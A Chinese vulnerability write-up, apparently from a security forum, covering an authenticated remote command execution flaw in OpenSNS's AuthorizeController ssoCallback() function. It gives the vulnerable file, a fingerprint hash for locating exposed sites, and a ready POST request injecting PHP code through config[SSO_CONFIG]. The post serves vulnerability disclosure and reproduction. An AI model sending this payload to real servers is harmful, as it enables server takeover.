问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞
# OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞 ## 漏洞描述 OpenSNS AuthorizeController.class.php文件 ssoCallback() 函数存在命令执行漏洞,在登录的情况下可以获取...
OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞 ================================================ 漏洞描述 ---- OpenSNS AuthorizeController.class.php文件 ssoCallback() 函数存在命令执行漏洞,在登录的情况下可以获取服务器权限 漏洞影响 ---- OpenSNS 网络测绘 ---- icon\_hash="1167011145" 漏洞复现 ---- 登录页面如下 ![img](https://shs3.b.qianxin.com/butian_public/f54460639fbdadb6aa8b8e50aeeb7265b8841d7f03201.jpg) 存在漏洞的文件为 `Application/Admin/Controller/AuthorizeController.class.php` ![img](https://shs3.b.qianxin.com/butian_public/f388122730ea592d3cbcfb4b3b6358cf0d75a8fe69943.jpg) 其中 config参数可控,构造请求就可以通过 file\_put\_contents 写入执行任意命令 ![img](https://shs3.b.qianxin.com/butian_public/f1651337d1667188e0dc0690c3ad1d3ee36b40bc84480.jpg) 构造请求包 ```php POST /admin.php?s=/Authorize/ssoCallback\ config[SSO_CONFIG]=phpinfo(); ``` ![img](https://shs3.b.qianxin.com/butian_public/f562865bc1e217afa9cd620d63c7a19ead2a397a1af1e.jpg)
发表于 2024-07-12 18:43:30
阅读 ( 998 )
分类:
CMS
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!